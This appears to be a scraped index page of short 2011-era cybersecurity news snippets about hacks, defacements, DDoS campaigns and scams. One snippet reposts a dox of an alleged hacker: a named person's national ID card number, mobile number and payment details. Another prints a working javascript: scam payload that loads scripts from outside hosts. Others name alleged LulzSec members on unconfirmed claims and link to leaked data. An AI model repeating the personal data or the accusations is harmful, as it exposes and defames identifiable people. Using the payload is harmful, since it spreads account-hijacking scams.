The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

Pakistan Cyber Army (PCA) owner SHAK Exposed By Indishell (Indian Hackers) Few Days Before , Pakistan Cyber Army got hacked by Indian Cyber Army (Indishell) , and Indishell Got whole Database of PCA site. They Explore the stuff and Got the Real Identity of PCA member, who was continuously hacking the thousands of Indian websites and Servers Daily. In Nov, 2010 CBI  was also hacked by some Pakistan hackers. Lets See What Indishell Got from Their Database Dump : 1.) On Private Message PCA admin Shak is asking for 8000 PKR to Teach Hacking Course (ECH). His Name and Bank details are below -- Name : Bilal Yaqoob Place:- Karachi, Sindhi Country :- Pakistan His Bank or what ever the payment details here are they ID card Number : 35202-1555072-9 PayMent GateWay :- easy paise Mobile number :-03324681620 (U PHONE) Studying in punjab university 2.) Adil, Member of PCA team was arrested (according to Pakistan Govt) ,in case of Cyber attack on Pakistan P...

#OpEverest :  Anonymous make Central website of the Nepal Government Down Anonymous have new #OpEverest Against Nepal Government . The open letter to Govt of Nepal from Anonymous is as shown. Nepal Government website is down because of DDos attack ! Link : https://www.nepalgov.gov.np/ They have define next some targets also : * https://www.ucpnm.org/ * https://www.nepalicongress.org/ * https://www.cpnuml.org/ * https://www.mjfn.org/ Stay Tuned for Updates :)

Fake antivirus campaign on India's DNA e-newspaper website ! DNA (Daily News and Analysis) is an Indian daily English language newspaper. According to Wikipedia, DNA ranks 8th among the top ten English dailies in India. Recently, the Zscaler solution was blocking access to this site, as it contained malicious content. Here is the homepage of this website: The 'Today's E-newspaper' link (circled above) is an online version of the printed periodical. We discovered that one of the pages from this e-newspaper site was infected with malicious script. Here is the screenshot of that page: The malicious script tag had been inserted in plain text as can be seen in this screenshot of page source: The malicious script tag directs the victim's browser to 'hxxp://vcvsta.com/ur.php'. This page then redirects the user to another malicious site ('hxxp://www4.to-gysave.byinter.net,), which will again redirect victim to random sites hosting fake antivirus campaigns. Here is the screenshot disp...

If you invite guest users into your Entra ID tenant, you may be opening yourself up to a surprising risk.  A gap in access control in Microsoft Entra's subscription handling is allowing guest users to create and transfer subscriptions into the tenant they are invited into, while maintaining full ownership of them.  All the guest user needs are the permissions to create subscriptions in their home tenant, and an invitation as a guest user into an external tenant. Once inside, the guest user can create subscriptions in their home tenant, transfer them into the external tenant, and retain full ownership rights. This stealthy privilege escalation tactic allows a guest user to gain a privileged foothold in an environment where they should only have limited access. Many organizations treat guest accounts as low-risk based on their temporary, limited access, but this behavior, which works as designed, opens the door to known attack paths and lateral movement within the resource t...

QuickRecon v0.3 version released ! QuickRecon is a simple information gathering tool that allows you to: find subdomain names, perform zone transfer, gather emails and find human relationships using microformats. It is a simple information gathering utility based on Qt4 toolkit. Download QuickRecon v0.3 here

New Facebook Scam : WTF I can't believe you're in this video ! If you happen to get a new wall post from your friend saying " WTF I can't believe you're in this vid " or " ROFL i cant believe youre tagged in this video " Its a new scam spreading on Facebook. Don't open or click on this link else it will be posted to all your friends wall, esp. copy any URL [java-script code] and paste in your browser navigation/location bar to help spread the message to all your friends. javascript:(function()%7Bfunction%20s(src)%7Bvar%20script%20%3D%20document.createElement(%22script%22)%3Bscript.src%20%3D%20src%3Bdocument.body.appendChild(script)%3B%7Dvar%20rand%20%3D%20Math.floor(Math.random()*(100))%3Bs(%22http%3A%2F%2Fvideosurge.info%2Fverify.js%22)%3B%20if(rand%20%3C%3D%2025)%20s(%22http%3A%2F%2Fvideosurge.info%2Fconfig.js%22)%3Belse%20s(%22http%3A%2F%2Fbanfish.info%2Fconfig.js%22)%3B%7D)()%3B Most importantly for the user who fall into such scams by clicking the links in impulse. Re...

Ronaldinho website hacked by Osama bin Laden supporter ! Ronaldinho's website has been hacked by someone appearing to support Osama bin Laden. GloboEsporte.com reports the hacker posted a photo of bin Laden and statements supporting Islam, as well as comments in Arabic attacking Ronaldinho's "hatred" of Islam. The site was hacked for a few hours on Saturday, according to the GloboEsporte.com website and other local media. Ronaldinho could not be contacted for comment. He signed with Flamengo in the beginning of the year, returning to Brazilian football after 10 years in Europe. He helped Flamengo win the Rio de Janeiro state championship, but fans had been jeering him recently because of poor performances that culminated with the team's elimination from the Brazilian Cup on Wednesday.

ISI (Pakistan)  hack email account of Indian Army Major ! A serving Inter-Services Intelligence (ISI) officer Major Sameer Ali hacked an Indian Army major's e-mail account in 2010 and extracted many sensitive documents, intelligence sources said. Ali has been named by India in the list of 50 'most wanted' terrorists sheltered by Pakistan for involvement in the Mumbai attacks conspiracy, The news of the hacking was given to Indian probe agencies by the FBI, which was then interrogating Mumbai attack accused David Coleman Headley. The US agency told the CBI Ali had been accessing an Indian Army officer's rediffmail account from the ISI headquarters. The hacked account was traced to Major Shantanu De of 21 Bihar Regiment, who was at that time posted in the Andamans. De's computer was seized and scrutinised jointly by the Intelligence Bureau, National Investigation Agency and the Military Intelligence. What was baffling was that his computer and e-mail had more t...

Geek.com Hacked, Infects Visitors with Malware ! Security researchers from cloud security provider Zscaler warn that technology website geek.com was compromised and many of its pages are executing drive-by download attacks against visitors. Geek.com is one of the oldest technology news websites around, dating back to 1996, the dawn of the commercial World Wide Web. Attackers have managed to inject rogue IFrames into different portions of the site, both within articles and the site's main pages like home, about us, etc. According to Umesh Wanve, a senior security research engineer at Zscaler, there are multiple infections and the iframes take visitors to different malicious websites. One example is the rogue code injected into a May 13 article about Call of Duty: Modern Warfare 3 details being leaked, which redirects visitors to an exploit kit. These kits perform various checks to determine what versions of certain program users have installed on their computers and th...

Once again Appin tech. hacked,this time TIC GROUP hack their one more site, Have a look : Hacked Domain: https://appinonline.com Mirror :  https://mirror.sec-t.net/defacements/?id=26044

LulzSec Hack & Leak pointless ATM information ! LulzSec Hack & Leak pointless ATM information on their official Twitter account. They are LulzSec, who Hack Fox.com cracked the Fox.com login database, including emails and passwords. Now they also Claim to have 178 logins from an FBI-related website. Leak of ATM info is at  https://pastebin.com/raw.php?i=myPTr0aE

Indian server HaCkeD By The 077 ( Hamdi HaCker ) Hacked Site list and Mirror : Link : https://zone-h.com/archive/ip=216.67.245.98

53 Websites defaced by Andre Corleone (Indonesian hacker) Hacked Sites List : https://pastebin.com/dsqCUbaX

Rumor or True ? FBI &  Fox.com hackers exposed : LulzSec Participants Identified ! Okay Now we have  LulzSec Participants, Just now Exposed by some Investigators at https://pastebin.com/EKmkvtfj . LulzSec are the guys who Hack Fox.com cracked the Fox.com login database, including emails and passwords . Now they Claim to have 178 logins from an FBI-related website. Update :  We have just talk to  OpNoPro  and He claim that, He is not the part of any HACKING ACTIVITY . Neither he is part of   LulzSec . Nothing is confirmed, But still there are lots of important things, that we have to consider before blaming anyone. These two identified guys can be Innocent. We are looking forward to Investigation teams for validating the news and Facts. Stay Tuned ! OpNoPro , heyguise  have been identified according to Source : OpNoPro Info AnonOps IRC Nic: OpNoPro AKA Lulz4All Likely the primary instigator of LulzSec. Pict...